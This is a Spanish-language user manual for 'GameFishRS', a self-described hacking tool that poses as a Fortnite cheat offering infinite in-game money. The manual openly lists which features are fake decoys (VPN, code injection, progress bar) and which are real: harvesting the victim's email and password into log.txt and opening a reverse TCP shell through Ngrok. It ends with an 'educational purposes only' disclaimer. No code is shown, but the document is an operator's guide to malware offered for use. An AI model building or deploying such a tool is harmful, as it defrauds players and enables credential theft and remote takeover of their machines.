


        ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣤⣤⡶⠖⠒⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣴⣶⣶⣦⡀                                                            ⢀⣴⣶⣶⣦⡀
        ⠀⠀⠀⠀⠀⠀⠀⣀⣤⣶⣾⣿⠟⠋⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣤⣾⣿⣿⣿⡟⠀⠀⢹⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡟⠀ ⢹⣿
        ⠀⠀⠀⠀⣀⣴⣾⣿⡿⢻⡿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣶⣿⡿⠟⠉⠁⠙⢿⣦⣤⣾⠏                                                            ⠙⢿⣦⣤⣾⠏
        ⠀⠀⣠⣾⣿⡿⠟⠁⠀⠘⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣾⣿⠟⠋⠀⠀⠀⠀⠀⠀⠉⠉⠀⠀
        ⠀⣼⣿⣿⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣴⣿⡿⠟⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
        ⣸⣿⡿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣴⣿⡿⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀    GameFishRS Hack Tool
        ⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀  <・)))><<⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣾⣿⠟⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
        ⢿⣿⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣤⣾⡿⠟⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀    created by GhostInThe5hell/G.I.T.S.
        ⠸⣿⣿⡀⠀⠀⠀⠀⠀⠀⠀⠀ GameFishRS⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣴⣿⡿⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
        ⠀⠹⣿⣷⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣤⣾⣿⠟⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀    https://pizzacakeweb.wixsite.com/pizzacake
        ⠀⠀⠘⢿⣿⣦⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⣾⣿⡿⠛⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
        ⠀⠀⠀⠀⠙⢿⣿⣶⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣴⣾⣿⡿⠟⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀    https://github.dev/GhostInThe5hell/GameFishRS/
        ⠀⠀⠀⠀⠀⠀⠙⠻⣿⣿⣶⣦⣤⣤⣀⣀⣀⣀⣤⣤⣤⣶⣾⣿⣿⠿⠛⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
        ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠉⠛⠻⠿⠿⣿⣿⣿⣿⡿⠿⠿⠛⠋⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀    pizzacakeweb@gmail.com





GameFishRS - Manual de Usuario

Requerimientos:
    -Ambas partes deben contar con conexion estable a internet.
    -Python3.x
    -Editor/IDE
    -Herramienta para leer y escribir en conexiones de red mediante TCP o UDP.
    -Ngrok

Descripción:
GameFishRS es una herramienta de hacking que utiliza el Phishing para capturar credenciales como e-mail y password y tambien establece una conexion reverse_tcp.

Funciones reales y esteticas:

    GameFishRS utiliza varios metodos esteticos como;
    -Inyección de código para obtener dinero infinito en el juego/app.(ESTETICO)
    -Conexión VPN: GameFishRS cuenta con una conexión VPN integrada para garantizar un alto nivel de seguridad y anonimato.(ESTETICO)
    -Registro de usuario: El usuario debe ingresar su correo electrónico y contraseña para confirmar su identidad y acceder a la herramienta.(ESTETICO/REAL)
    -GameFishRS preguntara por los credenciales dos veces con una prevencion para evitar que el usuario escriba diferente sus credenciales. Si los
     credenciales no concuerdan GameFishRS pedira al usuario volver a intentarlo, si los credenciales entrados las 2 veces concuerdan estos seran guardados en el archivo "log.txt" para luego ser descargados.(REAL)
    -Descarga con barra de progreso: GameFishRS muestra una barra de progreso durante la descarga del archivo de inyección de código.(ESTETICO)
    -Mensajes de error: Si la inyección de código falla, GameFishRS muestra un mensaje de error y proporciona sugerencias para resolver el problema.(ESTETICO)

Uso:

    Ingrese su correo electrónico y contraseña cuando se le solicite para confirmar su identidad y acceder a GameFishRS.
    GameFishRS establecerá automáticamente una conexión VPN para garantizar un alto nivel de seguridad y anonimato.
    Espere mientras GameFishRS descarga el archivo de inyección de código. Se muestra una barra de progreso durante la descarga.
    Una vez que se completa la descarga, GameFishRS inyecta automáticamente el código en el juego.
    Si la inyección de código falla, GameFishRS muestra un mensaje de error y proporciona sugerencias para resolver el problema.
    GameFishRS continúa ejecutándose hasta que se cierre manualmente.
    
Consejo: GameFishRS ya viene con una plantilla de un tema en especifico(FORTNITE), es su responsabilidad hacer TODOS los cambios pertinentes para llevar a 
        cabo su funcionamiento.

Nota: El uso de GameFishRS para obtener una ventaja injusta contra una persona sin su consentimiento es ilegal y puede resultar en consecuencias graves y puede ser procesable por ley. Esta herramienta solo tiene fines educativos y no se recomienda el uso de esta herramienta en situaciones ilegales o inapropiadas. El creador no se hace responsable por el mal uso de esta herramienta.
